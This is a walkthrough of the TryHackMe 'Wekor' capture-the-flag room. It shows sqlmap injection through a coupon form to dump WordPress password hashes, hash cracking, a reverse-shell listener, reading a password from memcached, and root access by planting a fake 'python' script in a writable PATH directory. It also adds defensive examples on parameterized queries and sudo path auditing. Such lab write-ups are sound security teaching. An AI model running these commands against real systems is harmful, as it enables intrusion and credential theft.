TryHackMe: Wekor Writeup

After a very long time, I am sharing a walk-through because I really like this CTF challenge (Wekor). This challenge includes SQLi, WordPress, and other things like recognizing an internal service for privilege escalation.

Challenge Link - https://tryhackme.com/room/wekorra

Initial Enumeration

As usual, I started with an nmap scan, using rustscan for faster results, with the command shown below.


❯ rustscan 10.10.4.25 --range 0-65535 --ulimit 5000 -- -sC -sV -Pn -o nmap.txt
.
.
.
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 95:c3:ce:af:07:fa:e2:8e:29:04:e4:cd:14:6a:21:b5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDn0l/KSmAk6LfT9R73YXvsc6g8qGZvMS+A5lJ19L4G5xbhSpCoEN0kBEZZQfI80sEU7boAfD0/VcdFhURkPxDUdN1wN7a/4alpMMMKf2ey0tpnWTn9nM9JVVI9rloaiD8nIuLesjigq+eEQCaEijfArUtzAJpESwRHrtm2OWTJ+PYNt1NDIbQm1HJHPasD7Im/wW6MF04mB04UrTwhWBHV4lziH7Rk8DYOI1xxfzz7J8bIatuWaRe879XtYA0RgepMzoXKHfLXrOlWJusPtMO2x+ATN2CBEhnNzxiXq+2In/RYMu58uvPBeabSa74BthiucrdJdSwobYVIL27kCt89
|   256 4d:99:b5:68:af:bb:4e:66:ce:72:70:e6:e3:f8:96:a4 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKJLaFNlUUzaESL+JpUKy/u7jH4OX+57J/GtTCgmoGOg4Fh8mGqS8r5HAgBMg/Bq2i9OHuTMuqazw//oQtRYOhE=
|   256 0d:e5:7d:e8:1a:12:c0:dd:b7:66:5e:98:34:55:59:f6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJvvZ5IaMI7DHXHlMkfmqQeKKGHVMSEYbz0bYhIqPp62
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
| http-robots.txt: 9 disallowed entries 
| /workshop/ /root/ /lol/ /agent/ /feed /crawler /boot 
|_/comingreallysoon /interesting

We have two open ports, and the scan result shows some interesting directories in the robots.txt file. Only /comingreallysoon is available. Also, per the introduction of the room, we have to use "wekor.thm" as the domain name. Visiting http://wekor.thm/comingreallysoon gives another directory.

Welcome Dear Client! We've setup our latest website on /it-next, Please go check it out! If you have any comments or suggestions, please tweet them to @faketwitteraccount! Thanks a lot !

We have a web application on /it-next, which is a shopping website. The next step is to run a directory brute force on /it-next using the command shown below:

❯ ffuf -u http://wekor.thm/it-next/FUZZ -fc 404 -t 250 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
.
.
.
________________________________________________

images                  [Status: 301, Size: 315, Words: 20, Lines: 10]
css                     [Status: 301, Size: 312, Words: 20, Lines: 10]
js                      [Status: 301, Size: 311, Words: 20, Lines: 10]
fonts                   [Status: 301, Size: 314, Words: 20, Lines: 10]
revolution              [Status: 301, Size: 319, Words: 20, Lines: 10]

I checked all the directories but couldn't find anything useful. Next, I decided to run the directory brute force again with some common extensions, especially PHP.

❯ ffuf -u http://wekor.thm/it-next/FUZZ -e .php,.txt,.html,.js -fc 404 -t 250 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
.
.
.
________________________________________________

images                  [Status: 301, Size: 315, Words: 20, Lines: 10]
index.php               [Status: 200, Size: 66925, Words: 19904, Lines: 1246]
css                     [Status: 301, Size: 312, Words: 20, Lines: 10]
js                      [Status: 301, Size: 311, Words: 20, Lines: 10]
config.php              [Status: 200, Size: 0, Words: 1, Lines: 1]
fonts                   [Status: 301, Size: 314, Words: 20, Lines: 10]

I found some .php files, but they are of no use. Next, I decided to enumerate the website manually and found something interesting in http://wekor.thm/it-next/it_cart.php: at the end we can use a coupon code. I tried the code 11 and it didn't work; next I tried 12345 and it worked.

Coupon Code : 12345 With ID : 1 And With Expire Date Of : doesnotexpire Is Valid!

Nice. This means these codes are stored somewhere in the database, and this form can be vulnerable to SQL injection. I tried manual exploitation first and it worked very easily; for the blog I have used sqlmap, otherwise the post would become very lengthy. You can contact me on Discord (cyberbot#1859) if you need help with manual SQL injection.

❯ sqlmap --url "http://wekor.thm/it-next/it_cart.php" --dbs --forms
.
.
.
available databases [6]:
[*] coupons
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] wordpress
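
Why a coupon lookup like this can be injectable, and the fix, shown as an added example that is not code from the room or from this write-up. The table layout, function names and sample rows are assumptions, and SQLite stands in for the target's MySQL database.

```python
import sqlite3

# Constructed input: the quote ends the string literal, the rest is parsed as SQL.
CRAFTED = "x' OR '1'='1"

def make_db():
    """In-memory stand-in for the coupons database (constructed sample rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE coupons (id INTEGER PRIMARY KEY, code TEXT, expire TEXT)")
    db.executemany(
        "INSERT INTO coupons (code, expire) VALUES (?, ?)",
        [("12345", "doesnotexpire"), ("77777", "2021-01-01")],
    )
    return db

def lookup_vulnerable(db, code):
    # The submitted value becomes part of the SQL text itself.
    query = "SELECT id, code, expire FROM coupons WHERE code = '%s'" % code
    return db.execute(query).fetchall()

def lookup_parameterized(db, code):
    # The value is bound separately and can only ever be compared as data.
    return db.execute(
        "SELECT id, code, expire FROM coupons WHERE code = ?", (code,)
    ).fetchall()

if __name__ == "__main__":
    db = make_db()
    for value in ("12345", "11", CRAFTED):
        print(repr(value), lookup_vulnerable(db, value), lookup_parameterized(db, value))
```

Binding the value closes the injection. Separately, the sqlmap output above lists the wordpress database through the coupon form, so restricting the shop's database account to the coupons schema would limit what such a flaw can read.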

Hmm, a database for WordPress? Okay, we will exploit this vulnerability later, because first of all we have to find a WordPress website. We have the domain wekor.thm, so what if there are subdomains and one of them is using WordPress? Let's find out.

❯ ffuf -H "Host: FUZZ.wekor.thm" -u http://wekor.thm -t 500 -fs 23 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
.
.
.
________________________________________________

Site                    [Status: 200, Size: 143, Words: 27, Lines: 6]
[WARN] Caught keyboard interrupt (Ctrl-C)

Let's add this to the /etc/hosts file.

❯ cat /etc/hosts | grep -i "wekor"
10.10.4.25	wekor.thm site.wekor.thm

Visiting http://site.wekor.thm/ doesn't give any information. Next, I decided to run a directory brute force against this subdomain using the command shown below.

❯ ffuf -u http://site.wekor.thm/FUZZ -fc 404 -t 250 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
.
.
.
________________________________________________

wordpress               [Status: 301, Size: 320, Words: 20, Lines: 10]

Great, we have found the WordPress website. Now let's get back to the SQLi vulnerability to get the username and password for the WordPress login.

❯ sqlmap --url "http://wekor.thm/it-next/it_cart.php" -D wordpress --tables --forms
.
.
.
.
Database: wordpress
[12 tables]
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+






**Fetching the column names in the wp_users table using the command below.**

❯ sqlmap --url "http://wekor.thm/it-next/it_cart.php" -D wordpress -T wp_users --columns --forms
.
.
.
[10 columns]
+---------------------+---------------------+
| Column              | Type                |
+---------------------+---------------------+
| display_name        | varchar(250)        |
| ID                  | bigint(20) unsigned |
| user_activation_key | varchar(255)        |
| user_email          | varchar(100)        |
| user_login          | varchar(60)         |
| user_nicename       | varchar(50)         |
| user_pass           | varchar(255)        |
| user_registered     | datetime            |
| user_status         | int(11)             |
| user_url            | varchar(100)        |
+---------------------+---------------------+


**Fetching all the records in the user_login and user_pass columns**

❯ sqlmap --url "http://wekor.thm/it-next/it_cart.php" -D wordpress -T wp_users -C user_login,user_pass --forms --dump
.
.
.

Table: wp_users
[4 entries]
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| admin      | $P$BoyfR2************************* |
| wp_jeffrey | $P$BU8QpW************************* |
| wp_yura    | $P$B6jSC3************************* |
| wp_eagle   | $P$BpyTRb************************* |
+------------+------------------------------------+


I tried cracking all the hashes, and 3 out of 4 were cracked easily using john.

❯ ../../john/run/john --show hash
?:ro**
?:s**
?:xx***

3 password hashes cracked, 1 left

We need to log in to the admin panel, and I found that the user wp_yura has maximum privileges in the control panel.

Now it's easy to get a reverse shell using the theme editor technique, right? I have skipped that part; now let's jump directly to privilege escalation.

❯ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.6.64.121] from (UNKNOWN) [10.10.4.25] 42488
Linux osboxes 4.15.0-133-generic #137~16.04.1-Ubuntu SMP Fri Jan 15 02:55:05 UTC 2021 i686 i686 i686 GNU/Linux
 03:58:22 up  1:45,  0 users,  load average: 0.02, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ cd /home
$ ls
Orka
lost+found
$ cd Orka
/bin/sh: 3: cd: can't cd to Orka

I found one user in /home, but www-data can't access Orka's home directory. I then started to explore different files and folders but failed to find anything. Next, I thought to check for services running internally that listen only on 127.0.0.1.

Command Used:

www-data@osboxes:/home$ netstat -ano
netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:3010          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN      off (0.00/0/0)

The service running on port 11211 is memcached, and I have seen this service enumerated in different CTF challenges. Basically, we can use this service to find the password of the user Orka, if I am not thinking in the wrong way. You can read more about memcached exploitation here.

www-data@osboxes:/home$ telnet 127.0.0.1 11211
telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
stats cachedump 1 0
stats cachedump 1 0
ITEM id [4 b; 1615360322 s]
ITEM email [14 b; 1615360322 s]
ITEM salary [8 b; 1615360322 s]
ITEM password [15 b; 1615360322 s]
ITEM username [4 b; 1615360322 s]
END
get username
get username
VALUE username 0 4
Orka
END
get password
get password
VALUE password 0 15
OrkAiSC****
END

Nice, we have Orka's password. Using su Orka we can get Orka's shell.

www-data@osboxes:/home$ su Orka
su Orka
Password: OrkAiS****

Orka@osboxes:/home$ id
id
uid=1001(Orka) gid=1001(Orka) groups=1001(Orka)
Orka@osboxes:/home$

Using sudo -l to check the user's privileges, I found this interesting thing:

env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User Orka may run the following commands on osboxes:
    (root) /home/Orka/Desktop/bitcoin

Running the bitcoin binary as root.

Orka@osboxes:/home$ sudo -u root /home/Orka/Desktop/bitcoin
sudo -u root /home/Orka/Desktop/bitcoin
Enter the password : lol
lol
Access Denied...

We need to find the correct password to get in. I transferred the binary to my local system and opened it in Ghidra, and there I found the correct password.

After accepting the correct password, the binary also runs a Python script, and if we observe carefully, it does not use an absolute path; it just calls python. We can take advantage of this with PATH-based privilege escalation.

Orka@osboxes:/tmp$ cat python
cat python
#!/bin/bash
/bin/bash
Orka@osboxes:/tmp$ chmod 777 python
chmod 777 python
Orka@osboxes:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH

I ran the bitcoin binary as root, but nothing happened; our python script in /tmp didn't execute. Why? Well, I don't know the reason for this, but then I thought to run the command echo $PATH on my local system and also on the target machine, and got completely different results.

Orka@osboxes:/tmp$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games



❯ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

Next I ran the linpeas.sh script and found that /usr/sbin/ is writable, so I just copied the file named python from /tmp to /usr/sbin/, because /usr/sbin/ has higher precedence than /usr/bin/. Executing the bitcoin binary as root again, this time it will call the python in /usr/sbin/ instead of the python in /usr/bin/.

Orka@osboxes:~$ cp /tmp/python /usr/sbin/
cp /tmp/python /usr/sbin/
Orka@osboxes:~$ sudo -u root /home/Orka/Desktop/bitcoin
sudo -u root /home/Orka/Desktop/bitcoin
Enter the password : ***
password
Access Granted...
			User Manual:			
Maximum Amount Of BitCoins Possible To Transfer at a time : 9 
Amounts with more than one number will be stripped off! 
And Lastly, be careful, everything is logged :) 
Amount Of BitCoins : 1
1
root@osboxes:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@osboxes:~#
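
The sudo -l output above shows env_reset and secure_path, so a command run through sudo searches that list rather than the caller's PATH, and /usr/sbin comes before /usr/bin in it. The added example below (not part of the original write-up) audits such a list for directories where a bare command name like python could be shadowed; the function name and the trusted_uid parameter are assumptions.

```python
import os
import stat

def audit_secure_path(secure_path, command, trusted_uid=0):
    """Return (resolved, risky_dirs) for a bare `command` looked up along secure_path.

    risky_dirs holds every directory searched up to and including the one that
    resolves the command (all of them if nothing resolves) that is owned by
    someone other than trusted_uid or has the group/other write bit set.
    """
    # `sudo -l` prints the separators escaped as "\:", as in the listing above.
    dirs = [d for d in secure_path.replace("\\:", ":").split(":") if d]
    resolved, risky = None, []
    for d in dirs:
        try:
            st = os.stat(d)
        except OSError:
            continue  # directory does not exist: nothing to check here
        if not stat.S_ISDIR(st.st_mode):
            continue
        if st.st_uid != trusted_uid or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            risky.append(d)
        candidate = os.path.join(d, command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            resolved = candidate
            break  # later directories are never searched for this name
    return resolved, risky

if __name__ == "__main__":
    # secure_path value copied from the sudo -l output in this write-up.
    listed = ("/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin"
              "\\:/sbin\\:/bin\\:/snap/bin")
    resolved, risky = audit_secure_path(listed, "python")
    print("python resolves to:", resolved)
    for d in risky:
        print("not root-only writable, searched before or at resolution:", d)
```

Any directory this reports should be returned to root ownership with mode 755, and a program allowed in sudoers should call its helpers by absolute path.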

We are root now, and this completes the challenge! I hope you liked the walkthrough. For any queries you can contact me on Discord at cyberbot#1859.

NOTE: The awesome artwork used in this article was created by chubasan.